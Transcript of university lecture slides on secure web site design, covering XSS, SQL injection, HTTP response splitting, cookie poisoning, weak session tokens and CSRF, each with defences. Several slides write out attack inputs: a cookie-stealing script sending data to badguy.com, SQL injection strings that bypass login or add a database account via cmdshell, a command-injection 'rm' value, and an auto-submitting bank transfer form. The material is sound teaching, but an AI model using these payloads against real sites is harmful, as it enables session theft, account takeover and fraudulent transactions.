Computer Security CS 426 Lecture 26 - PowerPoint PPT Presentation

1 / 41
About This Presentation
Title:

Computer Security CS 426 Lecture 26

Description:

(Most Slides taken from Prof. Dan Boneh CS 155 Slides at Stanford) ... MySpace.com ensures HTML contains no script , body , onclick, a href=javascript: ... – PowerPoint PPT presentation

Number of Views:225
Avg rating:3.0/5.0
Slides: 42
Provided by: NINGH7
Category:

less

Transcript and Presenter's Notes

Title: Computer Security CS 426 Lecture 26


1
Computer Security CS 426Lecture 26
  • Secure Web Site Design
  • (Most Slides taken from Prof. Dan Boneh CS 155
    Slides at Stanford)

2
Schematic web site architecture
WS1
Firewall
Firewall
ApplicationFirewall (WAF)
LoadBalancer
DB
AppServers
WS2
WS3
IDS
3
Web Application Firewalls
  • Prevent some attacks we discuss today
  • SQL Injection
  • Form field tampering
  • Cookie poisoning
  • Some examples
  • Imperva
  • Kavado Interdo
  • F5 TrafficShield
  • Citrix NetScaler
  • CheckPoint Web Intelligence

4
Our focus web app code
  • Common web-site attacks
  • Denial of Service
  • Attack the web server (IIS, Apache)
  • e.g. control hijacking CodeRed, Nimda,
  • Solutions
  • Harden web server stackguard, libsafe,
  • Worm defense
  • Host based intrusion detection,
  • Worm signatures generation, shields.
  • Today
  • Common vulnerabilities in web application code

5
Web app code
  • Runs on web server or app server.
  • Takes input from web users (via web server)
  • Interacts with the database and 3rd parties.
  • Prepares results for users (via web server)
  • Examples
  • Shopping carts, home banking, bill pay, tax
    prep,
  • New code written for every web site.
  • Written in
  • C, PHP, Perl, Python, JSP, ASP,
  • Often written with little consideration for
    security.

6
Common vulnerabilities
  • Inadequate validation of user input
  • Cross site scripting
  • SQL Injection
  • HTTP Splitting
  • Broken session management
  • Can lead to session hijacking and data theft
  • Insecure storage
  • Sensitive data stored in the clear.
  • Prime target for theft e.g. egghead, Verizon.
  • Note PCI Data Security Standard (Visa,
    Mastercard)

7
Warm up a simple example
  • Direct use of user input
  • http//victim.com/ copy.php ? nameusername
  • copy.php
  • Problem
  • http//victim.com/ copy.php ? namea rm
  • (should be namea2020rm20 )

8
Redirects
  • EZShopper.com shopping cart (10/2004)
  • http///cgi-bin/ loadpage.cgi ? pageurl
  • Redirects browser to url
  • Redirects are common on many sites
  • Used to track when user clicks on external link
  • EZShopper uses redirect to add HTTP headers
  • Problem phishing
  • http//victim.com/cgi-bin/loadpage ?
    pagephisher.com
  • Link to victim.com puts user at phisher.com
  • ? Local redirects should ensure target URL is
    local

9
Cross Site Scripting
10
The setup
  • User input is echoed into HTML response.
  • Example search field
  • http//victim.com/search.php ? term apple
  • search.php responds with
  • ltHTMLgt ltTITLEgt Search Results lt/TITLEgt
  • ltBODYgt
  • Results for lt?php echo _GETterm ?gt
  • . . .
  • lt/BODYgt lt/HTMLgt
  • Is this exploitable?

11
Bad input
  • Problem no validation of input term
  • Consider link (properly URL encoded)
  • http//victim.com/search.php ? term
  • ltscriptgt window.open(
  • http//badguy.com?cookie
  • document.cookie ) lt/scriptgt
  • What if user clicks on this link?
  • Browser goes to victim.com/search.php
  • Victim.com returns
  • ltHTMLgt Results for ltscriptgt lt/scriptgt
  • Browser executes script
  • Sends badguy.com cookie for victim.com

12
So what?
  • Why would user click on such a link?
  • Phishing email in webmail client (e.g. gmail).
  • Link in doubleclick banner ad
  • many many ways to fool user into clicking
  • What if badguy.com gets cookie for victim.com ?
  • Cookie can include session auth for victim.com
  • Or other data intended only for victim.com
  • Violates same origin policy

13
Even worse
  • Attacker can execute arbitrary scripts in browser
  • Can manipulate any DOM component on victim.com
  • Control links on page
  • Control form fields (e.g. password field) on this
    page and linked pages.
  • Can infect other users MySpace.com worm.

14
MySpace.com (Samy worm)
  • Users can post HTML on their pages
  • MySpace.com ensures HTML contains no
  • ltscriptgt, ltbodygt, onclick, lta hrefjavascript//gt
  • but can do Javascript within CSS tags
  • ltdiv stylebackgroundurl(javascriptalert(1))
    gt
  • And can hide javascript as java\nscript
  • With careful javascript hacking
  • Samys worm infects anyone who visits an
    infected MySpace page and adds Samy as a
    friend.
  • Samy had millions of friends within 24 hours.
  • More info http//namb.la/popular/tech.html

15
Avoiding XSS bugs (PHP)
  • Main problem
  • Input checking is difficult --- many ways to
    inject scripts into HTML.
  • Preprocess input from user before echoing it
  • PHP htmlspecialchars(string)
  • ? amp " ? quot ' ? 039
    lt ? lt gt ? gt
  • htmlspecialchars( "lta href'test'gtTestlt/agt",
    ENT_QUOTES)
  • Outputs lta href039test039gtTest
    lt/agt

16
Avoiding XSS bugs (ASP.NET)
  • ASP.NET 1.1
  • Server.HtmlEncode(string)
  • Similar to PHP htmlspecialchars
  • validateRequest (on by default)
  • Crashes page if finds ltscriptgt in POST data.
  • Looks for hardcoded list of patterns.
  • Can be disabled
  • lt_at_ Page validateRequestfalse"  gt

17
(No Transcript)
18
SQL Injection
19
The setup
  • User input is used in SQL query
  • Example login page (ASP)
  • set ok execute(SELECT FROM UserTable
  • WHERE username' form(user)
  • ' AND password' form(pwd) ' )
  • If not ok.EOF
  • login success
  • else fail
  • Is this exploitable?

20
Bad input
  • Suppose user ' or 1 1 -- (URL
    encoded)
  • Then scripts does
  • ok execute( SELECT
  • WHERE username ' ' or 11 -- )
  • The - - causes rest of line to be ignored.
  • Now ok.EOF is always false.
  • The bad news easy login to many sites this
    way.

21
Even worse
  • Suppose user
  • ' exec cmdshell
  • 'net user badguy badpwd' / ADD --
  • Then script does
  • ok execute( SELECT
  • WHERE username ' ' exec )
  • If SQL server context runs as sa, attacker gets
    account on DB server.

22
Avoiding SQL injection
  • Build SQL queries by properly escaping args '
    ? \'
  • Example Parameterized SQL (ASP.NET 1.1)
  • Ensures SQL arguments are properly escaped.
  • SqlCommand cmd new SqlCommand( "SELECT
    FROM UserTable WHERE username _at_User AND
    password _at_Pwd", dbConnection)
  • cmd.Parameters.Add("_at_User", Requestuser )
  • cmd.Parameters.Add("_at_Pwd", Requestpwd )
  • cmd.ExecuteReader()

23
HTTP Response Splitting
24
The setup
  • User input echoed in HTTP header.
  • Example Language redirect page (JSP)
  • lt response.redirect(/by_lang.jsp?lang
    request.getParameter(lang) ) gt
  • Browser sends http//.../by_lang.jsp ?
    langfrench
  • Server HTTP Response
  • HTTP/1.1 302 (redirect)
  • Date
  • Location /by_lang.jsp ? langfrench
  • Is this exploitable?

25
Bad input
  • Suppose browser sends
  • http//.../by_lang.jsp ? lang
  • french \n
  • Content-length 0 \r\n\r\n
  • HTTP/1.1 200 OK
  • Spoofed page (URL encoded)

26
Bad input
  • HTTP response from server looks like
  • HTTP/1.1 302 (redirect)
  • Date
  • Location /by_lang.jsp ? lang french
  • Content-length 0
  • HTTP/1.1 200 OK
  • Content-length 217
  • Spoofed page

lang
27
So what?
  • What just happened
  • Attacker submitted bad URL to victim.com
  • URL contained spoofed page in it
  • Got back spoofed page
  • So what?
  • Cache servers along path now store spoof of
    victim.com
  • Will fool any user using same cache server
  • Defense dont do that.

28
Summary thus far
29
App code
  • Little programming knowledge can be dangerous
  • Cross site scripting
  • SQL Injection
  • HTTP Splitting
  • What to do?
  • Band-aid Web App Firewall (WAF)
  • Looks for attack patterns and blocks requests
  • False positive / false negatives
  • Code checking

30
Code checking
  • Blackbox security testing services
  • Whitehatsec.com
  • Automated blackbox testing tools
  • Cenzic, Hailstorm
  • Spidynamic, WebInspect
  • eEye, Retina
  • Web application hardening tools
  • WebSSARI WWW04 based on information
    flow
  • Nguyen-Tuong IFIP05 based on tainting

31
Session Management
  • Cookies, hidden fields, and user authentication

32
Cookies
  • Used to store state on users machine

GET
Server
Browser
HTTP Header Set-cookie NAMEVALUE domain
(who can read) expires (when expires)
secure (only over SSL)
Server
Browser
GET Cookie NAME VALUE
Http is stateless protocol cookies add state
33
Cookies
  • Brower will store
  • At most 20 cookies/site, 3 KB / cookie
  • Uses
  • User authentication
  • Personalization
  • User tracking e.g. Doubleclick (3rd party
    cookies)

34
Cookie risks
  • Danger of storing data on browser
  • User can change values
  • Silly example Shopping cart software.
  • Set-cookie shopping-cart-total 150 ()
  • User edits cookie file (cookie poisoning)
  • Cookie shopping-cart-total 15 ()
  • bargain shopping.
  • Similar behavior with hidden fields
  • ltINPUT TYPEhidden NAMEprice VALUE150gt

35
Not so silly (as of 2/2000)
  • D3.COM Pty Ltd ShopFactory 5.8
  • _at_Retail Corporation _at_Retail
  • Adgrafix Check It Out
  • Baron Consulting Group WebSite Tool
  • ComCity Corporation SalesCart
  • Crested Butte Software EasyCart
  • Dansie.net Dansie Shopping Cart
  • Intelligent Vending Systems Intellivend
  • Make-a-Store Make-a-Store OrderPage
  • McMurtrey/Whitaker Associates Cart32 3.0
  • pknutsen_at_nethut.no CartMan 1.04
  • Rich Media Technologies JustAddCommerce 5.0
  • SmartCart SmartCart
  • Web Express Shoptron 1.2
  • Source http//xforce.iss.net/xforce/xfdb/4621

36
Example dansie.net shopping cart
  • ltFORM METHODPOST
  • ACTION"http//www.dansie.net/cgi-bin/scripts/car
    t.pl"gt
  • Black Leather purse with leather
    strapsltBRgtPrice 20.00ltBRgt
  • ltINPUT TYPEHIDDEN NAMEname VALUE"Black
    leather purse"gt ltINPUT TYPEHIDDEN NAMEprice
    VALUE"20.00"gt ltINPUT TYPEHIDDEN NAMEsh
    VALUE"1"gt ltINPUT TYPEHIDDEN NAMEimg
    VALUE"purse.jpg"gt ltINPUT TYPEHIDDEN
    NAMEreturn VALUE"http//www.dansie.net/demo.
    html"gt ltINPUT TYPEHIDDEN NAMEcustom1
    VALUE"Black leather purse with leather straps"gt
  • ltINPUT TYPESUBMIT NAME"add" VALUE"Put in
    Shopping Cart"gt
  • lt/FORMgt
  • CVE-2000-0253 (Jan. 2001), BugTraq ID 1115
  • http//www.dansie.net/demo.html (May, 2006)

37
Solution
  • When storing state on browser MAC data using
    server secret key.
  • .NET 2.0
  • System.Web.Configuration.MachineKey
  • Secret web server key intended for cookie
    protection
  • HttpCookie cookie new HttpCookie(name, val)
    HttpCookie encodedCookie HttpSecureCookie.
    Encode (cookie)
  • HttpSecureCookie.Decode (cookie)

38
Cookie authentication
Browser
Web Server
Auth server
Check val
39
Weak authenticators security risk
  • Predictable cookie authenticator
  • Verizon Wireless - counter
  • Valid user logs in, gets counter, can view
    sessions of other users.
  • Weak authenticator generation Fu et al. 01
  • WSJ.com cookie user, MACk(user)
  • Weak MAC exposes K from few cookies.
  • Apache Tomcat generateSessionID()
  • MD5(PRNG) but weak PRNG GM05.
  • Predictable SessionIDs

40
Cookie auth is insufficient
  • Example
  • User logs in to bank.com. Forgets to sign
    off.
  • Session cookie remains in browser state
  • Then user visits another site containing
  • ltform nameF actionhttp//bank.com/BillPay.ph
    pgt
  • ltinput namerecipient valuebadguygt
  • ltscriptgt document.F.submit() lt/scriptgt
  • Browser sends user auth cookie with request
  • Transaction will be fulfilled
  • Problem
  • cookie auth is insufficient when side effects can
    happen
  • Correct use use cookies hidden fields

41
Coming Attractions
  • November 28
  • Web Application Security
Write a Comment
User Comments (0)
About PowerShow.com